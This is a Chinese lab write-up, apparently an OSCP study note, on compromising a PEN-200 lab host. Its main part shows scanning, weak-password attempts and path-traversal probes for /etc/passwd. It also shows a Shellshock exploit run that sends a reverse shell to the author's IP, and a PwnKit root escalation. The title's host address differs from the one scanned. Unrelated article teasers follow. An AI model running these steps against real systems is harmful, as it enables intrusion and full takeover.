【pen200-lab】10.11.1.72

news2024/11/25 14:51:26

pen200-lab 学习笔记

【pen200-lab】10.11.1.72

🔥系列专栏:pen200-lab
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月27日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

  • pen200-lab 学习笔记
    • 信息收集
    • 80
        • 目录爆破

信息收集

nmap -p- --min-rate 10000 -A 10.11.1.71

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1af6a70dedc273a16fa3086828b53bbb (RSA)
|   256 e6438959f985d8e2bbe3d7ed285cc565 (ECDSA)
|_  256 3b0bf3843c7d6e2b2c811194169b717d (ED25519)
80/tcp open  http    Apache/2.4.7 (Ubuntu)
|_http-server-header: Apache/2.4.7 (Ubuntu)

与次同时我将开启nmap脚本自动扫描
./nmapAutomator.sh --host 10.11.1.71 --type All

80

首先进行
在这里插入图片描述
support@bigtreecms.org

在这里插入图片描述

目录爆破

gobuster dir -u http://10.11.1.71/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

在这里插入图片描述发现了phpmyadmin目录

在这里插入图片描述我将尝试下面的弱口令
admin \ “” (blank), admin \ admin, admin \ password
root \ “” (blank), root \ root, root \ password

可惜都失败了
紧接着我将查看刚才扫描出来的readme

curl 10.11.1.71/README.md

没有任何东西
在这里插入图片描述
紧接着,由于这是apache服务器,我将查看cgi

┌──(root㉿kali)-[~/Desktop/OSCP/OSCP TEST]
└─# gobuster dir -u http://10.11.1.71/ -w /usr/share/wfuzz/wordlist/vulns/cgis.txt  -e -b "400,404,403" -q
http://10.11.1.71/%2e/                 (Status: 302) [Size: 0] [--> site/index.php/]                                                                    
http://10.11.1.71/./                   (Status: 302) [Size: 0] [--> site/index.php/]                                                                    
http://10.11.1.71/cgi-bin/admin.cgi    (Status: 200) [Size: 821]
http://10.11.1.71/cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd (Status: 200) [Size: 820]
http://10.11.1.71/cgi-bin/test.cgi     (Status: 200) [Size: 1049834]
http://10.11.1.71/index.php/123        (Status: 302) [Size: 0] [--> site/index.php/]                                                                    
http://10.11.1.71/index.php/\          (Status: 302) [Size: 0] [--> site/index.php/]                                                                    
http://10.11.1.71/index.php?IDAdmin=test (Status: 302) [Size: 0] [--> site/index.php/]                                                                  
http://10.11.1.71/index.php?SqlQuery=test%20 (Status: 302) [Size: 0] [--> site/index.php/]                                                              
http://10.11.1.71/index.php?base=test%20 (Status: 302) [Size: 0] [--> site/index.php/]                                                                  
http://10.11.1.71/index.php?action=search&searchFor=\ (Status: 302) [Size: 0] [--> site/index.php/]
http://10.11.1.71/index.php?download=/etc/passwd (Status: 302) [Size: 0] [--> site/index.php/]                                                          
http://10.11.1.71/index.php?download=/windows/win.ini (Status: 302) [Size: 0] [--> site/index.php/]
http://10.11.1.71/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc (Status: 302) [Size: 0] [--> site/index.php/]                              
http://10.11.1.71/index.php?file=index.php (Status: 302) [Size: 0] [--> site/index.php/]                                                                
http://10.11.1.71/index.php?file=Liens&op=\ (Status: 302) [Size: 0] [--> site/index.php/]                                                               
http://10.11.1.71/index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd (Status: 302) [Size: 0] [--> site/index.php/]
http://10.11.1.71/index.php?download=/winnt/win.ini (Status: 302) [Size: 0] [--> site/index.php/]                                                       
http://10.11.1.71/index.php?page=../../../../../../../../../../etc/passwd (Status: 302) [Size: 0] [--> site/index.php/]                                 
http://10.11.1.71/index.php?tampon=test%20 (Status: 302) [Size: 0] [--> site/index.php/]                                                                
http://10.11.1.71/index.php?module=My_eGallery (Status: 302) [Size: 0] [--> site/index.php/]                                                            
http://10.11.1.71/index.php?page=../../../../../../../../../../boot.ini (Status: 302) [Size: 0] [--> site/index.php/]                                   
http://10.11.1.71/index.php?pymembs=admin (Status: 302) [Size: 0] [--> site/index.php/]                                                                 
http://10.11.1.71/index.php?sql_debug=1 (Status: 302) [Size: 0] [--> site/index.php/]                                                                   
http://10.11.1.71/index.php?|=../../../../../../../../../etc/passwd (Status: 302) [Size: 0] [--> site/index.php/]                                       
http://10.11.1.71/index.php?vo=        (Status: 302) [Size: 0] [--> site/index.php/]                        

http://10.11.1.71/cgi-bin/admin.cgi    (Status: 200) [Size: 821]
http://10.11.1.71/cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd (Status: 200) [Size: 820]
http://10.11.1.71/cgi-bin/test.cgi     (Status: 200) [Size: 1049834]

http://10.11.1.71/cgi-bin/test.cgi

这个挺有意思
在这里插入图片描述这与我们哟哦能够自动扫描具有同样的结果
在这里插入图片描述
自动扫描结果如下,显示他可能收到shellshock攻击

OSVDB-112004: /cgi-bin/admin.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/admin.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278)

我利用如下的脚本利用

https://github.com/b4keSn4ke/CVE-2014-6271

python exp.py 192.168.119.207 8888 http://10.11.1.71/cgi-bin/admin.cgi

我们成功获得了www用户

接着获取一个稳定的shell

python -c 'import pty;pty.spawn ("/bin/bash")'

接下来我们用linpeas.sh去枚举一些信息
在这里插入图片描述发现橘黄色信号
在这里插入图片描述利用的脚本如下
https://github.com/c3c/CVE-2021-4034
而后传输赋权即可

在这里插入图片描述
我们获得了root
紧接着在root目录中获得最终flag
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/46990.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

aws beanstalk 使用eb cli配置和启动环境

aws beanstalk 使用eb cli配置和启动环境

Elastic Beanstalk 不额外收费,只需为存储和运行应用程序所需的 AWS 资源付费 EB CLI 是 Amazon Elastic Beanstalk 的命令行界面,它提供了可简化从本地存储库创建、更新和监控环境的交互式命令 安装eb cli $ pip install virtualenv $ virtualenv ebve…
阅读更多...
2023年考研数学测试卷(预测)

2023年考研数学测试卷(预测)

2023年考研数学测试卷 原题再现: 多的我也不说了,直接把预测的2023年考研数学卷子分享给大家好吧,准确详细全面是我的宗旨,我的博客创立初衷和发展方向肯定不应该只是"考试有用",而是面对社会生产生活的有用…
阅读更多...
Day815.数据库参数设置优化 -Java 性能调优实战

Day815.数据库参数设置优化 -Java 性能调优实战

数据库参数设置优化 Hi,我是阿昌,今天学习记录的是关于数据库参数设置优化。 MySQL 是一个灵活性比较强的数据库系统,提供了很多可配置参数,便于根据应用和服务器硬件来做定制化数据库服务。 数据库主要是用来存取数据的&#…
阅读更多...
视频编解码 — DCT变换和量化

视频编解码 — DCT变换和量化

目录 视频编码流程 DCT变换 Hadamard变换 量化 H264中的DCT变换和量化 H264各模式的DCT变换和量化过程 1、亮度16x16帧内预测块 2,其它模式亮度块 3,色度块 小结 视频编码流程 DCT变换 离散余弦变换 它能将空域信号转换到频率上表示&#xff0…
阅读更多...
建造者模式

建造者模式

文章目录定义优点使用场景代码实现定义 将一个复杂对象的构建与它的表示分离,使得同样的构建过程可以创建不同的表示。 4个角色: Product产品类:通常是实现了模板方法模式,也就是有模板方法和基本方法Builder抽象建造者&#xf…
阅读更多...
PyQt5可视化编程-事件、信号和对话框

PyQt5可视化编程-事件、信号和对话框

一、概述: 所有的应用都是事件驱动的。事件大部分都是由用户的行为产生的,当然也有其他的事件产生方式,比如网络的连接,窗口管理器或者定时器等。调用应用的exec_()方法时,应用会进入主循环,主循环会监听和分发事件。…
阅读更多...
算法题:整数除法

算法题:整数除法

一.题目描述以及来源 给定两个整数 a 和 b ,求它们的除法的商 a/b ,要求不得使用乘号 *、除号 / 以及求余符号 % 。 注意: 整数除法的结果应当截去(truncate)其小数部分,例如:truncate(8.345…
阅读更多...
MP157-2-TF-A移植:

MP157-2-TF-A移植:

MP157-2-TF-A移植:1. TF-A移植:1.1 新建开发板的设备树1.2 修改设备树电源管理1.3修改TF卡和EMMC设备树1.4 修改USBOTG设备树2 编译测试2.1 Makefile.sdk 修改内容:2.2 编译命令:正点原子第九章内容:自己记的笔记&…
阅读更多...
SpringBoot(One·上)

SpringBoot(One·上)

SpringBoot一、简介概述Spring Boot特性SpringBoot四大核心二、SpringBoot项目分析1、创建第一个案例结构目录和pom文件2、Springboot集成mvcSpringboot核心配置文件application.propertiesSpringboot核心配置文件application.yml或者application.yamlapplication.ymlapplicati…
阅读更多...
Allegro削铜皮详细操作指导

Allegro削铜皮详细操作指导

Allegro削铜皮详细操作指导 Allegro可以编辑任意形状的铜皮,下面介绍几种削铜皮的方式 任意形状,shape-manual Void/cavity-Polygon 鼠标左键点击铜皮,铜皮会被亮起来 画出需要的形状 完成后如下图 方形shape-manual Void/cavity-Rectangular 同样的选择铜皮,画出需要…
阅读更多...
通过 js 给元素添加动画样式animation属性 ,以及 perspective 属性探究

通过 js 给元素添加动画样式animation属性 ,以及 perspective 属性探究

学习关键语句: js添加动画效果 js控制元素animation属性 写在前面 在制作组件的过程中呢 , 突然觉得这个动画啊应该由用户来决定到底是个啥样 , 但是怎么让用户操作这一步呢 ? 总不能让用户自己去写 css keyframe 吧 , 所以便有了这篇文章 , 同时 , 这篇文章的下半部分我们会…
阅读更多...
Python+Selenium:Google patent数据爬取

Python+Selenium:Google patent数据爬取

准备工作,已搭建Python环境,安装Selenium pip install selenium -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com 步骤1: 根据Chrome版本下载ChromeDriver 下载链接地址: ChromeDriver - WebDriver for Chrome - Downloads 如在帮助——>关于Ch…
阅读更多...
车道线检测-lanedet

车道线检测-lanedet

源码:https://github.com/Turoad/lanedet 这是一个常见的检测网络整合版本,目前包括的检测网络有: 模型论文介绍 SCNN,RESA论文介绍,UFLD介绍,laneNet|其它相关模型,LaneATT介绍 数据集介绍…
阅读更多...
机器学习之归一化

机器学习之归一化

机器学习之归一化1.目的1.1损失函数求解问题1.2 归一化目的2. 归一化2.1 最大值最小值归一化2.2 标准化1.目的 1.1损失函数求解问题 线性回归Loss函数梯度公式 参数含义θ\thetaθ函数参数α\alphaα学习率xjix^i_{j}xji​x:数据集,i:样本,j:特征 【数…
阅读更多...
OPengl学习(二)——opengl环境搭建

OPengl学习(二)——opengl环境搭建

文章目录0、 概念/准备1、VSOpengl快速添加手动编译2、QT中使用opengl1.pro配置文件2.引入头文件 继承QGLWidget3.实现三个主要函数3、引用0、 概念/准备 opengl官网地址 1、OpenGL 函数库相关的 API 有核心库(gl),实用库(glu&a…
阅读更多...
自动化状态监测和工业4.0解决方案-Softing uaGate SI

自动化状态监测和工业4.0解决方案-Softing uaGate SI

某公司为其注塑和反应/挤出系统采用了uaGate SI网关技术并实行了开放且独立于平台的OPC UA标准,以用于设备状态自动化监控,这有助于提高产量并避免机器停机。 自动化状态监测提高了产量并且可避免机器停机。为了将其设备控制系统与IT系统相连接起来&…
阅读更多...
最小生成树(Prim算法与Kruskal算法)

最小生成树(Prim算法与Kruskal算法)

一、什么是最小生成树 一个连通图的生成树是一个极小的连通子图,它含有图中全部的n个顶点,但只有足以构成一棵树的n-1条边。我们把构造连通网的最小代价生成树称为最小生成树。 例如下图中①、②、③都是左侧图的生成树,但③是构…
阅读更多...
k8s的亲和调度

k8s的亲和调度

k8s的亲和调度 出于高效通信等需求,偶尔需要把一些Pod对象组织在相近的位置(同一节点、机架、区域或地区等),例如应用程序的Pod及其后端提供数据服务的Pod等,我们可以认为这是一类具有亲和关系的Pod对象。 理想的实现方式是允许调度器把第一个…
阅读更多...
[附源码]计算机毕业设计springboot高校流浪动物领养网站

[附源码]计算机毕业设计springboot高校流浪动物领养网站

项目运行 环境配置: Jdk1.8 Tomcat7.0 Mysql HBuilderX(Webstorm也行) Eclispe(IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持)。 项目技术: SSM mybatis Maven Vue 等等组成,B/S模式 M…
阅读更多...
2022.11.28总结

2022.11.28总结

今天写了条件查询 虽然思路上还说是比较顺,但是还是写了一晚上,因为老是在细节上出现bug,改了好久,踩了好几个坑。 首先大概是因为组件不是确定的,我把ref属性绑定在router-view上,导致我获取不到条件选择…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023